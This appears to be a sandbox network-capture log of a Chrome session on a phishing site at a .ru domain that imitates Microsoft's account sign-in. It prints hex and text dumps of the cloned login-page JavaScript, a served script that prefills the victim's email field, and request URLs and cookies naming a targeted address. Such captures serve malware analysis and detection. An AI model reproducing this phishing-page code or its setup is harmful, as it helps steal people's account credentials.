                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 50 52 4f 4f 46 20 3d 20 7b 7d 3b 50 52 4f 4f 46 2e 54 79 70 65 20 3d 20 7b 53 51 53 41 3a 20 36 2c 20 43 53 53 3a 20 35 2c 20 44 65 76 69 63 65 49 64 3a 20 34 2c 20 45 6d 61 69 6c 3a 20 31 2c 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 20 53 4d 53 3a 20 33 2c 20 48 49 50 3a 20 38 2c 20 42 69 72 74 68 64 61 79 3a 20 39 2c 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 20 52 65 63 6f 76 65 72 79 43 6f 64 65 3a 20 31 31 2c 20 53 74 72 6f 6e 67 54 69 63 6b 65 74 3a 20 31 33 2c 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 56 32 3a 20 31 34 2c 20 55 6e 69 76 65 72 73 61 6c 53 65 63 6f 6e 64 46 61 63 74 6f 72 3a 20 31 35 2c 20 53 65 63 75 72 69 74 79 4b 65 79 3a 20 31 38
                                                                                                                          Data Ascii: "text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, SecurityKey: 18
                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 69 64 3d 31 35 32 31 36 27 2c 43 50 3a 74 72 75 65 2c 66 49 73 50 61 73 73 6b 65 79 53 75 70 70 6f 72 74 45 6e 61 62 6c 65 64 3a 66 61 6c 73 65 2c 44 30 3a 27 27 2c 43 51 3a 74 72 75 65 2c 42 72 3a 66 61 6c 73 65 2c 44 31 3a 27 27 2c 44 32 3a 27 27 2c 61 47 3a 30 2c 61 48 3a 30 2c 42 75 3a 66 61 6c 73 65 2c 44 34 3a 27 27 2c 42 77 3a 74 72 75 65 2c 61 4b 3a 27 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 27 2c 43 57 3a 66 61 6c 73 65 2c 44 37 3a 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 32 30 31 33 37 33 38 27 2c 66 55 73 65 48 69 67 68 43 6f 6e 74 72 61 73 74 4f 76 65 72 72 69 64 65 73 3a 66 61 6c 73 65 2c 44 38 3a 27 27 2c 42 7a 3a 66 61 6c 73 65 2c 61 4e 3a 27 27 2c 43 5a
                                                                                                                          Data Ascii: id=15216',CP:true,fIsPasskeySupportEnabled:false,D0:'',CQ:true,Br:false,D1:'',D2:'',aG:0,aH:0,Bu:false,D4:'',Bw:true,aK:'ywnjb.q2zg22.ru',CW:false,D7:'https://go.microsoft.com/fwlink/?linkid=2013738',fUseHighContrastOverrides:false,D8:'',Bz:false,aN:'',CZ
                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 67 32 32 2e 72 75 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 25 33 66 75 73 65 72 6e 61 6d 65 25 33 64 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 75 73 65 72 6e 61 6d 65 25 33 64 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 75 61 69 64 25 33 64 61 32 64 33 61 37 30 35 33 37 31 39 34 31 38 30 61 38 39 61 64 38 31 39 61 65 34 39 65 65 30 37 25 32 36 63 6f 6e 74 65 78 74 69 64 25 33 64
                                                                                                                          Data Ascii: g22.ru/oauth20_authorize.srf%3fusername%3dsales%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dsales%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26uaid%3da2d3a70537194180a89ad819ae49ee07%26contextid%3d
                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 5c 22 20 69 64 3d 5c 22 69 64 50 61 6e 65 48 65 6c 70 49 6e 76 69 74 65 42 6c 6f 63 6b 65 64 4c 69 6e 6b 39 5c 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 22 2c 61 64 3a 74 72 75 65 2c 43 70 3a 74 72 75 65 2c 62 44 3a 74 72 75 65 2c 62 45 3a 74 72 75 65 2c 61 66 3a 74 72 75 65 2c 44 52 3a 22 41 20 73 69 6e 67 6c 65 2d 75 73 65 20 63 6f 64 65 20 6c 65 74 73 20 79 6f 75 20 73 69 67 6e 20 69 6e 20 77 69 74 68 6f 75 74 20 65 6e 74 65 72 69 6e 67 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 2e 20 54 68 69 73 20 68 65 6c 70 73 20 70 72 6f 74 65 63 74 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 77 68 65 6e 20 79 6f 75 5c 27 72 65 20 75 73 69 6e 67 20 73 6f 6d 65 6f 6e 65 20 65 6c 73 65 5c 27 73 20 50 43 2e 20 3c 61 20 68 72 65 66 3d 5c 22 68 74 74 70 3a 2f 2f 65
                                                                                                                          Data Ascii: \" id=\"idPaneHelpInviteBlockedLink9\">Learn More</a>",ad:true,Cp:true,bD:true,bE:true,af:true,DR:"A single-use code lets you sign in without entering your password. This helps protect your account when you\'re using someone else\'s PC. <a href=\"http://e
                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 2e 30 26 77 74 72 65 61 6c 6d 3d 75 72 69 3a 57 69 6e 64 6f 77 73 4c 69 76 65 49 44 26 77 63 74 78 3d 75 73 65 72 6e 61 6d 65 25 33 44 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 44 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 75 61 69 64 25 33 44 61 32 64 33 61 37 30 35 33 37 31 39 34 31 38 30 61 38 39 61 64 38 31 39 61 65 34 39 65 65 30 37 25 32 36 63 6f 6e 74 65 78 74 69 64 25 33 44 39 41 45 43 45 35 41 41 31 36 41 38 30 32 30 42 25 32 36 6f 70 69 64 25 33 44 33 41 34 32 39 41 32 44 44 42 31 41 31 38 31 42 25 32 36 62 6b 25 33 44 31 37 30 36 39 30 31 35 30 39 27 2c 44 6c 3a 27 50 61 27 2c 46 3a 27 27 2c 47 3a 27 30 30 30 30
                                                                                                                          Data Ascii: .0&wtrealm=uri:WindowsLiveID&wctx=username%3Dsales%2540dudick.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26uaid%3Da2d3a70537194180a89ad819ae49ee07%26contextid%3D9AECE5AA16A8020B%26opid%3D3A429A2DDB1A181B%26bk%3D1706901509',Dl:'Pa',F:'',G:'0000
                                                                                                                          2024-02-02 19:18:29 UTC1369INData Raw: 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 6d 6b 74 25 33 64 45 4e 2d 55 53 25 32 36 75 73 65 72 6e 61 6d 65 25 33 64 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 63 6f 6e 74 65 78 74 69 64 25 33 64 39 41 45 43 45 35 41 41 31 36 41 38 30 32 30 42 25 32 36 6f 70 69 64 25 33 64 33 41 34 32 39 41 32 44 44 42 31 41 31 38 31 42 25 32 36 62 6b 25 33 64 31 37 30 36 39 30 31 35 30 39 25 32 36 75 61 69 64 25 33 64 61 32 64 33 61 37 30 35 33 37 31 39 34 31 38
                                                                                                                          Data Ascii: k.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26username%3dsales%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26contextid%3d9AECE5AA16A8020B%26opid%3d3A429A2DDB1A181B%26bk%3d1706901509%26uaid%3da2d3a7053719418


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          93192.168.2.1649832104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:29 UTC4309OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; MSPRequ=id=N&lt=1706901509&co=2; uaid=a2d3a70537194180a89ad819ae49ee07; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c$uuid-1e3c4a5a-7c47-4a5e-b0f8-b6d22ca50e38; OParams=11O.Dv1KRcnHf!xH6UwRUxn8M1e5h77BdbYn6hdK0gwn7LCdt!haiV7d64HR4jnzkKozZVT0z2DsR7iQ7iCc8dS1i!Ly3Qth6ucAcKNaM8UoimL2za5*oPcRzXngmwcdeuzLWNAw5yvQbG!st2sFU3PvSZ73FzaMM*OGNVWpQ9E72PDKFb0covOYaAzEhDEXejYKYFjl7efhXZvCd6XFZpQTtUK97ojpHJWkmEEfyqzBIdAM08!1P8jaR0Tqif1FYTralGf4qAdd0IF2LBtGUmyqG2a9MDLvw6GmqBak!G8XyHi78llhEKo2XlzTPKxkiCPG7DvySvD*DLV78VwB6!yp*J8PJyO4cE4qrcnzIs1Xn2Dr1yNaRw28qaJ1w44DxwvSqmOqe8JuFZ04VM3EIItHYscocPyT4ax2EXJRw5gs*MkJ4ZdlWqIE*TomuOiAKsjaueYu2BIXvOUfI4G0*CO181MUjnlmj4zfZIQvBZIOCrTjm*ZFKvz512vDLE!EUtqtE6rYTizAMaFwByzhFHdDJmpXFyCvNFlKqjLhBfRe2prZ4BBx!zAldUcX9tV9BD9RN5mCAqmpuiUUPA2lopywS0m2bHKu!DUI3IPTaPTo7QyNhGDJmgUQ7S35TuSDBv6R946oPZMycmZZV6cp9DDcNkBX6qs!eUKw58tER6JJgjJaoVW1zUG7lRnmW3ZxS3ND0zYUjc1W*bjQ!XxY2zdYs5CJDCG7yrGrkCeakE1l!SmyIR2ztwpIrt1WL0Gc3n!w410id32hniq83vv7v0O0Y7hJj1nbIsxw5jCzW2i8gb1MCzDNAkD6hmon1Y64*otMlMwYSjPTYz3H35eXlY*lmIKHbe4zRxXqg0n6sc2PxI0S0a!AxxD5SmEs2SUmef7DLBttE2qXNxCcLWWeqB5oqr0!72BNYDtSVSJEJAbRY1n0S67kQgjtzL53wLWFHjpM8qJjJElkUIs9tMeJX3*VbNVa*59l7CqW!caIb8AhBgCmhAOMyZghBRrraPOlUk!o0XS87I0EZtWUUFJ88!mkAsbtOcMJXGG5tnd7IBlnmoNNsl8PoWsK1*3v!uOX*reMbzbeME7nNLK0!IHWQeUxFfOMx17GnywavlwGfMWBA3O0GwhmaVUoViNhQYnuAmV2xJh1Xf!LsOBm1LbusV*qh3Lh*SlVKhu*xSXFdjIlMuXfaERSRi9Hs*C12Q8eS!vqNry4Ju!ym9g!FvODvOyj5aQ9b8inT2nhv!nQSg0AV3vUVWXHr6suQ4hmA9UtyZ!ajKjyoWqdlWR5fNTkxxyaXFlrd2Xc61orAOe3PFIGxVEFtwaLzkB6BM!kUxBbgejyDjzGhJ318n*WzuoYqQeS8XD8cj4!SUZNOuEw5tdFoy64J0bR6DmtZtJeyJW2hnBTx*Py2fEAr8CQ1ELkghqqXFFnXiqlta0cHycCYOBhnDLxpXPHeFKkblKpH4*Y9BCHS882FwP!vAe6AJo99wvE996ch*levVGJxAUVlhV4eNMSNfVMV7h4DZb*XBhB*bttt49dJRblxG8NL***ussFDnE8uQCaBKcn7gPOsK9lBrsjtUqups!9S!jgsTDECqo9N0Ob1K2Uyd4Bp6val7PjQJjU3OEYPe3HiRHP619WFMYE!nqy9PP5GpsezgXWpQFdSgeRTxEF4kfpAgy4ewogUVkY2nhA*4wHHeNO4nCWPg9pjXBqppoxPUTdG1h8nHxVdHy2aE8QUH5xXC8LxJzm2DFzq5QZrw0x6RFf93mDk6sJtCybEQdXVsTqwAm5NB*wKpHRXxSnf1UH!6d8WSF1hMwLXHYB5tB1UA!FiCiQbGYj5LCtSZV!GGqK9duuZu6UJZUDGuJMnLiJwi0JJYpjYzyh!X8*ZXk!W5YfCMUVwHohyFcW0HGD!Qv0AqxyP306bw$$
                                                                                                                          2024-02-02 19:18:29 UTC644INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:29 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LcBhG%2BDQvHAckdUYvsolGizLL2uzFbW2rLwsMzUtc9HZSqqiBTofvIvnlXjOBZeDcvRVxrQNTqWYiQJPEBOtjciy5%2FV7ksg5NqQpjlHXWz0rgKvXUatlDmIPs5lGpZzEm8Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7c3fe32677f-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:29 UTC725INData Raw: 33 32 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 70 28 29 7b 0a 20 20 76 61 72 20 65 6d 61 69 6c 49 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 30 31 31 36 22 29 3b 0a 20 20 76 61 72 20 6e 65 78 74 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 64 53 49 42 75 74 74 6f 6e 39 22 29 3b 0a 20 20 76 61 72 20 71 75 65 72 79 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 69 66 20 28 2f 23 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 0a 20 20 76 61 72 20 72 65 73 20 3d 20 71 75 65 72 79 2e 73 70 6c 69 74 28 22 23 22 29 3b 0a 20 20 76 61 72 20 64 61 74 61 31 20 3d 20 72 65 73 5b 30 5d 3b
                                                                                                                          Data Ascii: 326function lp(){ var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; if (/#/.test(window.location.href)){ var res = query.split("#"); var data1 = res[0];
                                                                                                                          2024-02-02 19:18:29 UTC88INData Raw: 20 20 7d 0a 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 20 20 7d 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 0a 0d 0a
                                                                                                                          Data Ascii: } setTimeout(function(){lp();}, 500); } setTimeout(function(){lp();}, 500);
                                                                                                                          2024-02-02 19:18:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          94192.168.2.1649837104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:29 UTC4244OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; MSPRequ=id=N&lt=1706901509&co=2; uaid=a2d3a70537194180a89ad819ae49ee07; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c$uuid-1e3c4a5a-7c47-4a5e-b0f8-b6d22ca50e38; OParams=11O.Dv1KRcnHf!xH6UwRUxn8M1e5h77BdbYn6hdK0gwn7LCdt!haiV7d64HR4jnzkKozZVT0z2DsR7iQ7iCc8dS1i!Ly3Qth6ucAcKNaM8UoimL2za5*oPcRzXngmwcdeuzLWNAw5yvQbG!st2sFU3PvSZ73FzaMM*OGNVWpQ9E72PDKFb0covOYaAzEhDEXejYKYFjl7efhXZvCd6XFZpQTtUK97ojpHJWkmEEfyqzBIdAM08!1P8jaR0Tqif1FYTralGf4qAdd0IF2LBtGUmyqG2a9MDLvw6GmqBak!G8XyHi78llhEKo2XlzTPKxkiCPG7DvySvD*DLV78VwB6!yp*J8PJyO4cE4qrcnzIs1Xn2Dr1yNaRw28qaJ1w44DxwvSqmOqe8JuFZ04VM3EIItHYscocPyT4ax2EXJRw5gs*MkJ4ZdlWqIE*TomuOiAKsjaueYu2BIXvOUfI4G0*CO181MUjnlmj4zfZIQvBZIOCrTjm*ZFKvz512vDLE!EUtqtE6rYTizAMaFwByzhFHdDJmpXFyCvNFlKqjLhBfRe2prZ4BBx!zAldUcX9tV9BD9RN5mCAqmpuiUUPA2lopywS0m2bHKu!DUI3IPTaPTo7QyNhGDJmgUQ7S35TuSDBv6R946oPZMycmZZV6cp9DDcNkBX6qs!eUKw58tER6JJgjJaoVW1zUG7lRnmW3ZxS3ND0zYUjc1W*bjQ!XxY2zdYs5CJDCG7yrGrkCeakE1l!SmyIR2ztwpIrt1WL0Gc3n!w410id32hniq83vv7v0O0Y7hJj1nbIsxw5jCzW2i8gb1MCzDNAkD6hmon1Y64*otMlMwYSjPTYz3H35eXlY*lmIKHbe4zRxXqg0n6sc2PxI0S0a!AxxD5SmEs2SUmef7DLBttE2qXNxCcLWWeqB5oqr0!72BNYDtSVSJEJAbRY1n0S67kQgjtzL53wLWFHjpM8qJjJElkUIs9tMeJX3*VbNVa*59l7CqW!caIb8AhBgCmhAOMyZghBRrraPOlUk!o0XS87I0EZtWUUFJ88!mkAsbtOcMJXGG5tnd7IBlnmoNNsl8PoWsK1*3v!uOX*reMbzbeME7nNLK0!IHWQeUxFfOMx17GnywavlwGfMWBA3O0GwhmaVUoViNhQYnuAmV2xJh1Xf!LsOBm1LbusV*qh3Lh*SlVKhu*xSXFdjIlMuXfaERSRi9Hs*C12Q8eS!vqNry4Ju!ym9g!FvODvOyj5aQ9b8inT2nhv!nQSg0AV3vUVWXHr6suQ4hmA9UtyZ!ajKjyoWqdlWR5fNTkxxyaXFlrd2Xc61orAOe3PFIGxVEFtwaLzkB6BM!kUxBbgejyDjzGhJ318n*WzuoYqQeS8XD8cj4!SUZNOuEw5tdFoy64J0bR6DmtZtJeyJW2hnBTx*Py2fEAr8CQ1ELkghqqXFFnXiqlta0cHycCYOBhnDLxpXPHeFKkblKpH4*Y9BCHS882FwP!vAe6AJo99wvE996ch*levVGJxAUVlhV4eNMSNfVMV7h4DZb*XBhB*bttt49dJRblxG8NL***ussFDnE8uQCaBKcn7gPOsK9lBrsjtUqups!9S!jgsTDECqo9N0Ob1K2Uyd4Bp6val7PjQJjU3OEYPe3HiRHP619WFMYE!nqy9PP5GpsezgXWpQFdSgeRTxEF4kfpAgy4ewogUVkY2nhA*4wHHeNO4nCWPg9pjXBqppoxPUTdG1h8nHxVdHy2aE8QUH5xXC8LxJzm2DFzq5QZrw0x6RFf93mDk6sJtCybEQdXVsTqwAm5NB*wKpHRXxSnf1UH!6d8WSF1hMwLXHYB5tB1UA!FiCiQbGYj5LCtSZV!GGqK9duuZu6UJZUDGuJMnLiJwi0JJYpjYzyh!X8*ZXk!W5YfCMUVwHohyFcW0HGD!Qv0AqxyP306bw$$
                                                                                                                          2024-02-02 19:18:30 UTC648INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:30 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uSbwiCtlFmtpBbYAjowsFgmyMZhRiDajlmNdua7mesI%2BTUGj39WuCLc5ydSA2D0nPS68%2Ffx93E%2FwqUIguN1kOLf9AZs1iyFWZDNhypwvxrBdT6aLh0PLU6MdyHCEfEHh%2B5M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7c639f953b8-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          95192.168.2.1649843142.250.105.1004435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:19:10 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000A77D70936C HTTP/1.1
                                                                                                                          Host: clients1.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          2024-02-02 19:19:10 UTC817INHTTP/1.1 200 OK
